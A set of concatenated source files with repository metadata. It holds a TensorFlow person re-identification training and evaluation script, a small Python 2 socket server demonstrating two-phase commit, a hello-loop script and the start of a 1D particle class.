val_loss_t, val_acc_t = sess.run(
[cost, accuracy],
{X_input: valid_source[k * batch_size: (k + 1) * batch_size],
y_input: valid_target[k * batch_size: (k + 1) * batch_size],
lr: learning_rate})
val_loss.append(val_loss_t)
val_acc.append(val_acc_t)
else:
val_loss_t, val_acc_t, frame_preds = sess.run(
[cost, accuracy, pred],
{X_input: valid_source[k * batch_size: (k + 1) * batch_size],
y_input: valid_target[k * batch_size: (k + 1) * batch_size],
lr: learning_rate})
# pred_prob = frame_preds / np.tile(np.sum(frame_preds, axis=1), [frame_preds.shape[1], 1]).T
# pred_prob = np.sum(frame_preds, axis=0)
# all_frame_preds.extend(pred_prob)
all_frame_preds.extend(frame_preds)
val_loss.append(val_loss_t)
val_acc.append(val_acc_t)
if manner == 'ap':
sequence_pred_correct = 0
sequence_num = 0
for k in range(len(all_frame_preds) // time_steps):
sequence_labels = np.argmax(valid_target[k * time_steps: (k + 1) * time_steps], axis=1)
if (sequence_labels == np.tile(sequence_labels[0], [sequence_labels.shape[0]])).all():
frame_predictions = np.array(all_frame_preds[k * time_steps: (k + 1) * time_steps])
sequence_pred = np.argmax(np.average(frame_predictions, axis=0))
if sequence_pred == sequence_labels[0]:
# print(sequence_pred)
sequence_pred_correct += 1
sequence_num += 1
seq_acc_t = sequence_pred_correct / sequence_num
# val_acc.append(val_acc_t)
if manner == 'sc':
if sum(val_acc) / len(val_acc) >= max(val_accs):
saver.save(sess, new_dir + "/trained_model.ckpt")
val_accs.append(sum(val_acc) / len(val_acc))
print(
'Epoch {:>3}/{} Batch {:>4}/{} - Train Loss: {:>6.3f} - Train_Acc: {:>6.3f} - Val_Acc {:>6.3f} {:>6.3f} (max)'
.format(epoch_i,
epochs,
batch_i,
len(train_target) // batch_size,
loss,
train_acc,
sum(val_acc) / len(val_acc),
max(val_accs)
))
else:
if seq_acc_t >= max(val_accs):
saver.save(sess, new_dir + "/trained_model.ckpt")
# np.save(new_dir + '/val_X.npy', valid_source)
# np.save(new_dir + '/val_y.npy', valid_target)
# if epoch_i % 30 == 0:
# evaluate_reid('CAGEs_RN_models/' + dataset + '_' + attention + '_RN_' + manner)
val_accs.append(seq_acc_t)
print(
'Epoch {:>3}/{} Batch {:>4}/{} - Train Loss: {:>6.3f} - Train_Acc: {:>6.3f} - Val_Acc {:>6.3f} {:>6.3f} (max)'
.format(epoch_i,
epochs,
batch_i,
len(train_target) // batch_size,
loss,
train_acc,
seq_acc_t,
max(val_accs)
))
train_loss.append(loss)
test_loss.append(sum(val_loss) / len(val_loss))
step += 1
# saver.save(sess, new_dir + "/trained_model.ckpt")
np.save(new_dir + '/train_X.npy', train_source)
np.save(new_dir + '/train_y.npy', train_target)
np.save(new_dir + '/val_X.npy', valid_source)
np.save(new_dir + '/val_y.npy', valid_target)
print('Model Trained and Saved')
np.save(new_dir + '/train_loss.npy', np.array(train_loss))
np.save(new_dir + '/test_loss.npy', np.array(test_loss))
np.save(new_dir + '/acc.npy', np.array(accs))
disc_str = ''
disc_str += str(train_loss[-1]) + '-' + str(np.min(train_loss)) + ' ' + str(test_loss[-1]) + '-' + str(
np.min(test_loss)) + ' ' \
+ str(np.max(acc))
f = open(ps + '.txt', 'w')
f.write(disc_str)
f.close()
return 1
def encoder_classify_union_directly_IAS(X, y, t_X, t_y, t_2_X, t_2_y, new_dir, ps, dataset):
print(t_X.shape, t_y.shape)
global epochs, attention, manner
epochs = 300
try:
os.mkdir(new_dir)
except:
pass
from sklearn.preprocessing import label_binarize
ids = np.load('Datasets/' + frames_ps + dataset + '_train_npy_data/ids_' + dataset + '_' + str(time_steps) + '.npy')
ids = ids.item()
t_ids = np.load('Datasets/' + frames_ps + dataset + '_test_npy_data/ids_' + dataset + '-A_' + str(time_steps) + '.npy')
t_ids = t_ids.item()
t_2_ids = np.load('Datasets/' + frames_ps + dataset + '_test_npy_data/ids_' + dataset + '-B_' + str(time_steps) + '.npy')
t_2_ids = t_2_ids.item()
ids_keys = sorted(list(ids.keys()))
classes = [i for i in ids_keys]
y = label_binarize(y, classes=classes)
t_ids_keys = sorted(list(t_ids.keys()))
classes = [i for i in t_ids_keys]
t_y = label_binarize(t_y, classes=classes)
t_2_ids_keys = sorted(list(t_2_ids.keys()))
classes = [i for i in t_2_ids_keys]
t_2_y = label_binarize(t_2_y, classes=classes)
train_source = X
train_target = y
valid_source = t_X
valid_target = t_y
valid_2_source = t_2_X
valid_2_target = t_2_y
if Model == 'rev_rec_plus':
if manner == 'sc':
first_size = rnn_size * time_steps * 3 * 3
else:
first_size = rnn_size * 3 * 3
X_input = tf.placeholder(tf.float32, [None, first_size], name='X_input')
y_input = tf.placeholder(tf.int32, [None, len(classes)], name='y_input')
lr = tf.Variable(0.0005, trainable=False, dtype=tf.float32, name='learning_rate')
W1 = tf.Variable(tf.random_normal([first_size, rnn_size]), name='W1')
b1 = tf.Variable(tf.zeros(shape=[rnn_size, ]), name='b1')
Wx_plus_b1 = tf.matmul(X_input, W1) + b1
l1 = tf.nn.relu(Wx_plus_b1)
W = tf.Variable(tf.random_normal([rnn_size, len(classes)]), name='W')
b = tf.Variable(tf.zeros(shape=[len(classes), ], name='b'))
pred = tf.matmul(l1, W) + b
else:
if manner == 'sc':
first_size = rnn_size * time_steps * 3
else:
first_size = rnn_size * 3
X_input = tf.placeholder(tf.float32, [None, first_size], name='X_input')
y_input = tf.placeholder(tf.int32, [None, len(classes)], name='y_input')
lr = tf.Variable(0.0005, trainable=False, dtype=tf.float32, name='learning_rate')
W1 = tf.Variable(tf.random_normal([first_size, rnn_size]), name='W1')
b1 = tf.Variable(tf.zeros(shape=[rnn_size, ]), name='b1')
Wx_plus_b1 = tf.matmul(X_input, W1) + b1
l1 = tf.nn.relu(Wx_plus_b1)
W = tf.Variable(tf.random_normal([rnn_size, len(classes)]), name='W')
b = tf.Variable(tf.zeros(shape=[len(classes), ], name='b'))
pred = tf.matmul(l1, W) + b
with tf.name_scope("new_train"):
optimizer = tf.train.AdamOptimizer(learning_rate, name="Adam3")
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y_input))
gradients = optimizer.compute_gradients(cost)
capped_gradients = [(tf.clip_by_value(grad, -5., 5.), var) for grad, var in gradients if grad is not None]
train_op = optimizer.minimize(cost)
correct_pred = tf.equal(tf.argmax(pred, 1),tf.argmax(y_input, 1))
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
def get_new_train_batches(targets, sources, batch_size):
for batch_i in range(0, len(sources) // batch_size):
start_i = batch_i * batch_size
sources_batch = sources[start_i:start_i + batch_size]
targets_batch = targets[start_i:start_i + batch_size]
yield targets_batch, sources_batch
init = tf.global_variables_initializer()
with tf.Session(config=config) as sess:
sess.run(init)
step = 0
train_loss = []
test_loss = []
test_2_loss = []
accs = []
val_accs = [0]
val_2_accs = [0]
saver = tf.train.Saver()
max_accs = [0, 0]
new_dir += '/' + ps
try:
os.mkdir(new_dir)
except:
pass
# if attention == 'BA':
# manner == 'sc'
for epoch_i in range(1, epochs + 1):
for batch_i, (y_batch, X_batch) in enumerate(
get_new_train_batches(train_target, train_source, batch_size)):
_, loss, acc = sess.run([train_op, cost, accuracy],
{X_input: X_batch,
y_input: y_batch,
lr: learning_rate})
accs.append(acc)
if epoch_i % 1 == 0:
loss, train_acc = sess.run([cost, accuracy],
{X_input: X_batch,
y_input: y_batch,
lr: learning_rate})
val_loss = []
val_acc = []
val_2_loss = []
val_2_acc = []
flag = 0
if valid_source.shape[0] < batch_size:
flag = batch_size - valid_source.shape[0]
valid_source = valid_source.tolist()
valid_target = valid_target.tolist()
valid_source.extend([valid_source[0]] * flag)
valid_target.extend([valid_target[0]] * flag)
valid_source = np.array(valid_source)
valid_target = np.array(valid_target)
if valid_2_source.shape[0] < batch_size:
flag = batch_size - valid_2_source.shape[0]
valid_2_source = valid_2_source.tolist()
valid_2_target = valid_2_target.tolist()
valid_2_source.extend([valid_2_source[0]] * flag)
valid_2_target.extend([valid_2_target[0]] * flag)
valid_2_source = np.array(valid_2_source)
valid_2_target = np.array(valid_2_target)
if manner == 'ap':
all_frame_preds = []
all_2_frame_preds = []
for k in range(valid_source.shape[0] // batch_size):
if manner == 'sc':
val_loss_t, val_acc_t = sess.run(
[cost, accuracy],
{X_input: valid_source[k * batch_size: (k + 1) * batch_size],
y_input: valid_target[k * batch_size: (k + 1) * batch_size],
lr: learning_rate})
val_loss.append(val_loss_t)
val_acc.append(val_acc_t)
else:
val_loss_t, val_acc_t, frame_preds = sess.run(
[cost, accuracy, pred],
{X_input: valid_source[k * batch_size: (k + 1) * batch_size],
y_input: valid_target[k * batch_size: (k + 1) * batch_size],
lr: learning_rate})
all_frame_preds.extend(frame_preds)
val_loss.append(val_loss_t)
val_acc.append(val_acc_t)
for k in range(valid_2_source.shape[0] // batch_size):
if manner == 'sc':
val_2_loss_t, val_2_acc_t = sess.run(
[cost, accuracy],
{X_input: valid_2_source[k * batch_size: (k + 1) * batch_size],
y_input: valid_2_target[k * batch_size: (k + 1) * batch_size],
lr: learning_rate})
val_2_loss.append(val_2_loss_t)
val_2_acc.append(val_2_acc_t)
else:
val_2_loss_t, val_2_acc_t, frame_2_preds = sess.run(
[cost, accuracy, pred],
{X_input: valid_2_source[k * batch_size: (k + 1) * batch_size],
y_input: valid_2_target[k * batch_size: (k + 1) * batch_size],
lr: learning_rate})
all_2_frame_preds.extend(frame_2_preds)
val_2_loss.append(val_2_loss_t)
val_2_acc.append(val_2_acc_t)
if manner == 'ap':
sequence_pred_correct = 0
sequence_num = 0
sequence_2_pred_correct = 0
sequence_2_num = 0
for k in range(len(all_frame_preds) // time_steps):
sequence_labels = np.argmax(valid_target[k * time_steps: (k + 1) * time_steps], axis=1)
if (sequence_labels == np.tile(sequence_labels[0], [sequence_labels.shape[0]])).all():
frame_predictions = np.array(all_frame_preds[k * time_steps: (k + 1) * time_steps])
sequence_pred = np.argmax(np.average(frame_predictions, axis=0))
if sequence_pred == sequence_labels[0]:
# print(sequence_pred)
sequence_pred_correct += 1
sequence_num += 1
seq_acc_t = sequence_pred_correct / sequence_num
for k in range(len(all_2_frame_preds) // time_steps):
sequence_2_labels = np.argmax(valid_2_target[k * time_steps: (k + 1) * time_steps], axis=1)
if (sequence_2_labels == np.tile(sequence_2_labels[0], [sequence_2_labels.shape[0]])).all():
frame_2_predictions = np.array(all_2_frame_preds[k * time_steps: (k + 1) * time_steps])
sequence_2_pred = np.argmax(np.average(frame_2_predictions, axis=0))
if sequence_2_pred == sequence_2_labels[0]:
# print(sequence_pred)
sequence_2_pred_correct += 1
sequence_2_num += 1
seq_2_acc_t = sequence_2_pred_correct / sequence_2_num
# val_acc.append(val_acc_t)
if manner == 'sc':
if sum(val_acc) / len(val_acc) >= max(val_accs) or sum(val_2_acc) / len(val_2_acc) >= max(val_2_accs):
saver.save(sess, new_dir + "/trained_model.ckpt")
np.save(new_dir + '/val_X.npy', valid_source)
np.save(new_dir + '/val_y.npy', valid_target)
val_accs.append(sum(val_acc) / len(val_acc))
val_2_accs.append(sum(val_2_acc)/len(val_2_acc))
print(
'Epoch {:>3}/{} Batch {:>4}/{} - Train Loss: {:>6.3f} - V_Acc (IAS-A): {:>6.3f} {:>6.3f} (max) - V_Acc (IAS-B) {:>6.3f} {:>6.3f} (max)'
.format(epoch_i,
epochs,
batch_i,
len(train_target) // batch_size,
loss,
sum(val_acc) / len(val_acc),
max(val_accs),
sum(val_2_acc) / len(val_2_acc),
max(val_2_accs)
))
else:
# if seq_acc_t > 0.5 and seq_2_acc_t > 0.5:
pre_1 = max(val_accs)
pre_2 = max(val_2_accs)
if seq_acc_t > pre_1:
saver.save(sess, new_dir + "/A_trained_model.ckpt")
if seq_2_acc_t > pre_2:
saver.save(sess, new_dir + "/B_trained_model.ckpt")
# print(max(pre_1, seq_acc_t), max(seq_2_acc_t, pre_2))
if (seq_acc_t > pre_1 and seq_acc_t + seq_2_acc_t > pre_1 + pre_2) \
or (seq_2_acc_t > pre_2 and seq_acc_t + seq_2_acc_t > pre_1 + pre_2):
max_accs[0] = seq_acc_t
max_accs[1] = seq_2_acc_t
saver.save(sess, new_dir + "/trained_model.ckpt")
# np.save(new_dir + '/val_X.npy', valid_source)
# np.save(new_dir + '/val_y.npy', valid_target)
val_accs.append(seq_acc_t)
val_2_accs.append(seq_2_acc_t)
print(
'Epoch {:>3}/{} Batch {:>4}/{} - Train Loss: {:>6.3f} - V_Acc (IAS-A): {:>6.3f} {:>6.3f} (max) - V_Acc (IAS-B) {:>6.3f} {:>6.3f} (max)'
.format(epoch_i,
epochs,
batch_i,
len(train_target) // batch_size,
loss,
seq_acc_t,
max(pre_1, seq_acc_t),
seq_2_acc_t,
max(seq_2_acc_t, pre_2)
))
train_loss.append(loss)
test_loss.append(sum(val_loss) / len(val_loss))
test_2_loss.append(sum(val_2_loss) / len(val_2_loss))
step += 1
saver = tf.train.Saver()
# new_dir += '/' + ps
# try:
# os.mkdir(new_dir)
# except:
# pass
# saver.save(sess, new_dir + "/trained_model.ckpt")
np.save(new_dir + '/train_X.npy', train_source)
np.save(new_dir + '/train_y.npy', train_target)
# np.save(new_dir + '/train_preds', train_preds)
np.save(new_dir + '/val_X.npy', valid_source)
np.save(new_dir + '/val_y.npy', valid_target)
np.save(new_dir + '/val_2_X.npy', valid_2_source)
np.save(new_dir + '/val_2_y.npy', valid_2_target)
# np.save(new_dir + 'val_preds.npy', valid_preds)
print('Model Trained and Saved')
np.save(new_dir + '/train_loss.npy', np.array(train_loss))
np.save(new_dir + '/test_A_loss.npy', np.array(test_loss))
np.save(new_dir + '/test_B_loss.npy', np.array(test_loss))
np.save(new_dir + '/acc.npy', np.array(accs))
disc_str = ''
disc_str += str(train_loss[-1]) + '-' + str(np.min(train_loss)) + ' ' + str(test_loss[-1]) + '-' + str(
np.min(test_loss)) + ' ' \
+ str(np.max(acc))
f = open(ps + '.txt', 'w')
f.write(disc_str)
f.close()
return 1
def evaluate_reid(model_dir):
# print('Print the Validation Loss and Rank-1 Accuracy for each testing bacth: ')
global batch_size, dataset, manner
X = np.load(model_dir + '/val_X.npy')
y = np.load(model_dir + '/val_y.npy')
print(X.shape, y.shape)
if dataset == 'IAS':
X_2 = np.load(model_dir + '/val_2_X.npy')
y_2 = np.load(model_dir + '/val_2_y.npy')
if dataset == 'BIWI':
classes = [i for i in range(28)]
elif dataset == 'KGBD':
classes = [i for i in range(164)]
elif dataset == 'IAS':
classes = [i for i in range(11)]
elif dataset == 'KinectReID':
classes = [i for i in range(71)]
elif dataset == 'KS20':
classes = [i for i in range(20)]
checkpoint = model_dir + "/trained_model.ckpt"
if dataset == 'IAS':
checkpoint = model_dir + "/A_trained_model.ckpt"
loaded_graph = tf.get_default_graph()
from sklearn.preprocessing import label_binarize
from sklearn.metrics import roc_curve, auc, confusion_matrix
nAUC = 0
def cal_AUC(score_y, pred_y, ps, draw_pic=False):
score_y = np.array(score_y)
pred_y = label_binarize(np.array(pred_y), classes=classes)
# Compute micro-average ROC curve and ROC area
fpr, tpr, thresholds = roc_curve(pred_y.ravel(), score_y.ravel())
roc_auc = auc(fpr, tpr)
y_true = np.argmax(pred_y, axis=-1)
y_pred = np.argmax(score_y, axis=-1)
print('\n### Re-ID Confusion Matrix: ')
print(confusion_matrix(y_true, y_pred))
return roc_auc
if draw_pic:
fig = plt.figure()
lw = 2
plt.plot(fpr, tpr, color='darkorange',
lw=lw, label='ROC curve (area = %0.2f)' % roc_auc)
plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Receiver operating characteristic: ' + ps)
plt.legend(loc="lower right")
fig.savefig('30 epoch ROC')
plt.close()
with tf.Session(graph=loaded_graph, config=config) as sess:
loader = tf.train.import_meta_graph(checkpoint + '.meta')
loader.restore(sess, checkpoint)
X_input = loaded_graph.get_tensor_by_name('X_input:0')
y_input = loaded_graph.get_tensor_by_name('y_input:0')
lr = loaded_graph.get_tensor_by_name('learning_rate:0')
pred = loaded_graph.get_tensor_by_name('add_1:0')
cost = loaded_graph.get_tensor_by_name('new_train/Mean:0')
accuracy = loaded_graph.get_tensor_by_name('new_train/Mean_1:0')
correct_num = 0
total_num = 0
rank_acc = {}
ys = []
preds = []
accs = []
cnt = 0
Rank_1 = 0
if dataset == 'IAS':
print('### Validation Results on IAS-A: ')
if manner == 'sc':
for batch_i, (y_batch, X_batch) in enumerate(
get_new_train_batches(y, X, batch_size)):
loss, acc, pre = sess.run([cost, accuracy, pred],
{X_input: X_batch,
y_input: y_batch,
lr: learning_rate})
ys.extend(y_batch.tolist())
preds.extend(pre.tolist())
accs.append(acc)
cnt += 1
for i in range(y_batch.shape[0]):
for K in range(1, len(classes) + 1):
if K not in rank_acc.keys():
rank_acc[K] = 0
t = np.argpartition(pre[i], -K)[-K:]
if np.argmax(y_batch[i]) in t:
rank_acc[K] += 1
correct_num += acc * batch_size
total_num += batch_size
print(
'Testing Bacth: {:>3} - Validation Loss: {:>6.3f} - Validation Rank-1 Accuracy {:>6.3f}'
.format(cnt,
loss,
acc,
))
for K in rank_acc.keys():
rank_acc[K] /= total_num
total_acc = correct_num / total_num
Rank_1 = total_acc
# print('Rank-1 Accuracy: %f' % total_acc)
nAUC = cal_AUC(score_y=preds,pred_y=ys, ps='nAUC')
else:
all_frame_preds = []
for batch_i, (y_batch, X_batch) in enumerate(
get_new_train_batches(y, X, batch_size)):
loss, acc, pre = sess.run([cost, accuracy, pred],
{X_input: X_batch,
y_input: y_batch,
lr: learning_rate})
ys.extend(y_batch.tolist())
preds.extend(pre.tolist())
all_frame_preds.extend(pre)
accs.append(acc)
cnt += 1
# for i in range(y_batch.shape[0]):
# for K in range(1, len(classes) + 1):
# if K not in rank_acc.keys():
# rank_acc[K] = 0
# t = np.argpartition(pre[i], -K)[-K:]
# if np.argmax(y_batch[i]) in t:
# rank_acc[K] += 1
# correct_num += acc * batch_size
# total_num += batch_size
# print(
# 'Testing Bacth: {:>3} - Validation Loss: {:>6.3f} - Validation Rank-1 Accuracy {:>6.3f}'
# .format(cnt,
# loss,
# acc,
# ))
# for K in rank_acc.keys():
# rank_acc[K] /= total_num
sequence_pred_correct = 0
sequence_num = 0
sequence_preds = []
sequence_ys = []
rank_acc = {}
for k in range(len(all_frame_preds) // time_steps):
sequence_labels = np.argmax(y[k * time_steps: (k + 1) * time_steps], axis=1)
# print(sequence_labels)
if (sequence_labels == np.tile(sequence_labels[0], [sequence_labels.shape[0]])).all():
frame_predictions = np.array(all_frame_preds[k * time_steps: (k + 1) * time_steps])
sequence_pred = np.argmax(np.average(frame_predictions, axis=0))
temp_pred = np.average(frame_predictions, axis=0)
for K in range(1, len(classes) + 1):
if K not in rank_acc.keys():
rank_acc[K] = 0
t = np.argpartition(temp_pred, -K)[-K:]
if sequence_labels[0] in t:
rank_acc[K] += 1
if sequence_pred == sequence_labels[0]:
sequence_pred_correct += 1
sequence_num += 1
sequence_ys.append(sequence_labels[0])
aver = np.average(frame_predictions, axis=0)
sequence_preds.append(aver)
for K in rank_acc.keys():
rank_acc[K] /= sequence_num
seq_acc_t = sequence_pred_correct / sequence_num
# total_acc = correct_num / total_num
# print('(Frame) Rank-1 Accuracy: %f' % total_acc)
Rank_1 = seq_acc_t
sequence_ys = label_binarize(sequence_ys, classes=classes)
# cal_AUC(score_y=preds,pred_y=ys, ps='nAUC')
nAUC = cal_AUC(score_y=sequence_preds, pred_y=sequence_ys, ps='nAUC')
print('### Rank-n Accuracy: ')
print(rank_acc)
print('### Rank-1 Accuracy: %f' % Rank_1)
print('### nAUC: ' + str(nAUC))
if dataset == 'IAS':
checkpoint = model_dir + "/B_trained_model.ckpt"
loaded_graph = tf.get_default_graph()
nAUC = 0
with tf.Session(graph=loaded_graph, config=config) as sess:
loader = tf.train.import_meta_graph(checkpoint + '.meta')
loader.restore(sess, checkpoint)
X_input = loaded_graph.get_tensor_by_name('X_input:0')
y_input = loaded_graph.get_tensor_by_name('y_input:0')
lr = loaded_graph.get_tensor_by_name('learning_rate:0')
pred = loaded_graph.get_tensor_by_name('add_1:0')
cost = loaded_graph.get_tensor_by_name('new_train/Mean:0')
accuracy = loaded_graph.get_tensor_by_name('new_train/Mean_1:0')
correct_num = 0
total_num = 0
rank_acc = {}
ys = []
preds = []
accs = []
cnt = 0
Rank_1 = 0
print('### Validation Results on IAS-B: ')
# IAS-B
if manner == 'sc':
correct_num = 0
total_num = 0
rank_acc = {}
ys = []
preds = []
accs = []
cnt = 0
for batch_i, (y_batch, X_batch) in enumerate(
get_new_train_batches(y_2, X_2, batch_size)):
loss, acc, pre = sess.run([cost, accuracy, pred],
{X_input: X_batch,
y_input: y_batch,
lr: learning_rate})
ys.extend(y_batch.tolist())
preds.extend(pre.tolist())
accs.append(acc)
cnt += 1
for i in range(y_batch.shape[0]):
for K in range(1, len(classes) + 1):
if K not in rank_acc.keys():
rank_acc[K] = 0
t = np.argpartition(pre[i], -K)[-K:]
if np.argmax(y_batch[i]) in t:
rank_acc[K] += 1
correct_num += acc * batch_size
total_num += batch_size
# print(
# 'Testing Bacth: {:>3} - Validation Loss: {:>6.3f} - Validation Rank-1 Accuracy {:>6.3f}'
# .format(cnt,
# loss,
# acc,
# ))
for K in rank_acc.keys():
rank_acc[K] /= total_num
total_acc = correct_num / total_num
Rank_1 = total_acc
# print('Rank-1 Accuracy: %f' % total_acc)
nAUC = cal_AUC(score_y=preds, pred_y=ys, ps='nAUC')
else:
all_frame_preds = []
for batch_i, (y_batch, X_batch) in enumerate(
get_new_train_batches(y_2, X_2, batch_size)):
loss, acc, pre = sess.run([cost, accuracy, pred],
{X_input: X_batch,
y_input: y_batch,
lr: learning_rate})
ys.extend(y_batch.tolist())
preds.extend(pre.tolist())
accs.append(acc)
all_frame_preds.extend(pre)
cnt += 1
# for i in range(y_batch.shape[0]):
# for K in range(1, len(classes) + 1):
# if K not in rank_acc.keys():
# rank_acc[K] = 0
# t = np.argpartition(pre[i], -K)[-K:]
# if np.argmax(y_batch[i]) in t:
# rank_acc[K] += 1
# # correct_num += acc * batch_size
# total_num += batch_size
# print(
# 'Testing Bacth: {:>3} - Validation Loss: {:>6.3f} - Validation Rank-1 Accuracy {:>6.3f}'
# .format(cnt,
# loss,
# acc,
# ))
# for K in rank_acc.keys():
# rank_acc[K] /= total_num
sequence_pred_correct = 0
sequence_num = 0
sequence_preds = []
sequence_ys = []
rank_acc = {}
for k in range(len(all_frame_preds) // time_steps):
sequence_labels = np.argmax(y_2[k * time_steps: (k + 1) * time_steps], axis=1)
if (sequence_labels == np.tile(sequence_labels[0], [sequence_labels.shape[0]])).all():
frame_predictions = np.array(all_frame_preds[k * time_steps: (k + 1) * time_steps])
sequence_pred = np.argmax(np.average(frame_predictions, axis=0))
temp_pred = np.average(frame_predictions, axis=0)
for K in range(1, len(classes) + 1):
if K not in rank_acc.keys():
rank_acc[K] = 0
t = np.argpartition(temp_pred, -K)[-K:]
if sequence_labels[0] in t:
rank_acc[K] += 1
if sequence_pred == sequence_labels[0]:
sequence_pred_correct += 1
sequence_num += 1
sequence_ys.append(sequence_labels[0])
aver = np.average(frame_predictions, axis=0)
sequence_preds.append(aver)
for K in rank_acc.keys():
rank_acc[K] /= sequence_num
seq_acc_t = sequence_pred_correct / sequence_num
Rank_1 = seq_acc_t
# total_acc = correct_num / total_num
# print('(Frame) Rank-1 Accuracy: %f' % total_acc)
# print('Rank-1 Accuracy: %f' % seq_acc_t)
sequence_ys = label_binarize(sequence_ys, classes=classes)
# cal_AUC(score_y=preds, pred_y=ys, ps='nAUC')
nAUC = cal_AUC(score_y=sequence_preds, pred_y=sequence_ys, ps='nAUC')
print('### Rank-n Accuracy: ')
print(rank_acc)
print('### Rank-1 Accuracy: %f' % Rank_1)
print('### nAUC: ' + str(nAUC))
from sklearn.preprocessing import label_binarize
from sklearn.metrics import roc_curve, auc
def cal_AUC(scores, labels, ps):
scores = np.array(scores)
labels = np.array(labels)
# pred_y = label_binarize(np.array(pred_y), classes=classes)
# Compute micro-average ROC curve and ROC area
fpr, tpr, thresholds = roc_curve(labels.ravel(), scores.ravel())
roc_auc = auc(fpr, tpr)
print(ps + ': ' + str(roc_auc))
if __name__ == '__main__':
tf.app.run()
| [
"wang.shuxi@outlook.com"
] | wang.shuxi@outlook.com |
9d1fb42471abeeb801d4ba9a1bfad944700ce406 | 12c3cee16358928e4f00120fb45b43448c4a64d1 | /hello.py | d2b6e1ff2b8beef1dc14b50c173c8a067af81d34 | [] | no_license | stifalex/py1 | dc643a4f53c64ef15fb280d80aca67fd60ccd108 | bd467b85377c6aa79ffcad1e65f18b263773842d | refs/heads/master | 2020-05-31T23:55:35.384306 | 2019-06-17T10:53:01 | 2019-06-17T10:53:01 | 190,547,366 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 59 | py | x=int(input())
m=1
while m<=x:
m+=1
print("hello")
| [
"noreply@github.com"
] | stifalex.noreply@github.com |
15dc4ff64abd92df677bf9a8ef641da64b92adda | d77eb6ee080e59c83e102a76e9476e51e0184fe7 | /server3.py | 3559324adde8de1b97d067cb81a5621bff29d710 | [] | no_license | ricatosin/2PC | ce0acff4d225ef3d8c28e7bef5bdac4027816463 | 027f8745516cc8d3658a826efefba00cda5d9e39 | refs/heads/master | 2020-03-24T19:20:46.919514 | 2018-07-30T19:53:13 | 2018-07-30T19:53:13 | 142,920,796 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,969 | py | ##########################################################
##Codigo cliente escrito por Ricardo Tosin ###############
##########################################################
import socket
import sys
import datetime
import time
from thread import *
logServer3 = open('logServer3.txt','w') # Abre arquivo escrita do logServer3
datelog = datetime.datetime.now().strftime("%A, %d. %B %Y %I:%M%p") #Etiqueta de tempo para organizar log por data e hora
#VARIAVEL DE CONTROLE DE MODIFICACAO
pode_Alterar = False
storage_server = 0 #Variavel que armazena o valor a ser alterado
HOST = '127.0.0.1' # Significa todas as interfaces disponiveis
PORT = 8888 # Porta Arbitraria nao Privilegiada
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Socket Criado'
#Binda o Socket para porta local
try:
s.bind((HOST, PORT))
except socket.error , msg:
print 'Falha no Bind. Error Code : ' + str(msg[0]) + ' Mensagem: ' + msg[1]
sys.exit()
print 'Socket bind SERVER 3 completo'
#Comeca a escutar o Socket de Rede
#Valor 10 s.listen() limita a conexao ate 10 ou seja a 11 ira ser recusada.
s.listen(10)
print 'Escutando Socket'
logServer3.write(datelog + '---->' + 'Servidor 1 com IP :' + HOST + 'Iniciado na porta: ' + str(PORT) + '\n')
#Funcao para lidar com as conexoes e criar Threads
def clientthread(conn):
global pode_Alterar
#Enviando Mensagem ao Cliente Conectado.
conn.send('ok') #Somente String
#Loop Infinito, assim a thread nao termina.
while True:
#Recebendo do Cliente
data = conn.recv(1024)
if (data == 'commit'):
logServer3.write(datelog + '---->' + 'OK ENVIADO AO CLIENTE : '+ addr[0] + ':' + str(addr[1])+ '\n')
pode_Alterar = True
time.sleep(3)
reply = 'commit'
conn.sendall(reply)
break
if (data == 'altera'):
logServer3.write(datelog + '---->' + 'ALTERANDO DADOS PARA O CLIENTE: ' + addr[0] + ':' + str(addr[1]) + '\n')
pode_Alterar = True
time.sleep(3)
storage_server = 1;
logServer3.write(datelog + '---->' + 'DADO STORAGE MODIFICADO PARA CLIENTE: '+ addr[0] + ':' + str(addr[1]) + '\n' )
reply = 'commit'
break
if (data == 'abort'):
logServer3.write(datelog + '---->' + 'TENTATIVA DE ALTERAR FALHOU NO CLIENTE :' + addr[0] + ':' + str(addr[1]) + '\n')
elif not data:
break
pode_Alterar = False
#Saindo do Loop
conn.close()
#Continua Conectando com Clientes
while 1:
#Espera para aceitar a conexao - blocking call
if (pode_Alterar == True):
conn, addr = s.accept()
conn.send("NOK") # CASO JA EXISTA UMA CONEXAO ATIVA ENVIA ABORT AO CLIENTE
conn.close()
if (pode_Alterar == False):
conn, addr = s.accept()
logServer3.write(datelog + '---->' + 'ABERTA CONEXAO COM CLIENTE : ' + addr[0] + ':' + str(addr[1]) + '\n')
print 'Connectado com ' + addr[0] + ':' + str(addr[1])
#Inicia a Thread.
pode_Alterar == True
start_new_thread(clientthread, (conn,))
logServer3.close()
s.close()
| [
"noreply@github.com"
] | ricatosin.noreply@github.com |
c553d74eaa132d25fe4fc5ed0e0a10d05a9ff9e5 | f2a55f94783fed2a53bc2ff1a0096cfdb75dc5a3 | /3rd Year Diatomic Simulation Exercise/Particle1D.py | 9b7e688d4446b103fb241661e708022f216dd910 | [] | no_license | callous4567/UoE-Projects | c7b307878ae1d6b7e00227bb1a681aec2ad55b1f | 5a4ee803f70f7da9d860f905114a71278c7f50e7 | refs/heads/master | 2023-02-18T22:19:25.496429 | 2023-02-13T01:00:19 | 2023-02-13T01:00:19 | 245,646,389 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,034 | py | """
CMod Ex2: Particle1D, a class to describe 1D particles
"""
class Particle1D(object):
"""
Class to describe 1D particles.
Properties:
position(float) - position along the x axis
velocity(float) - velocity along the x axis
mass(float) - particle mass
Methods:
* formatted output
* kinetic energy
* first-order velocity update
* first- and second order position updates
"""
def __init__(self, pos, vel, mass):
"""
Initialise a Particle1D instance
:param pos: position as float
:param vel: velocity as float
:param mass: mass as float
"""
self.position = pos
self.velocity = vel
self.mass = mass
def __str__(self):
"""
Define output format.
For particle p=(2.0, 0.5, 1.0) this will print as
"x = 2.0, v = 0.5, m = 1.0"
"""
return "x = " + str(self.position) + ", v = " + str(self.velocity) + ", m = " + str(self.mass)
def kinetic_energy(self):
"""
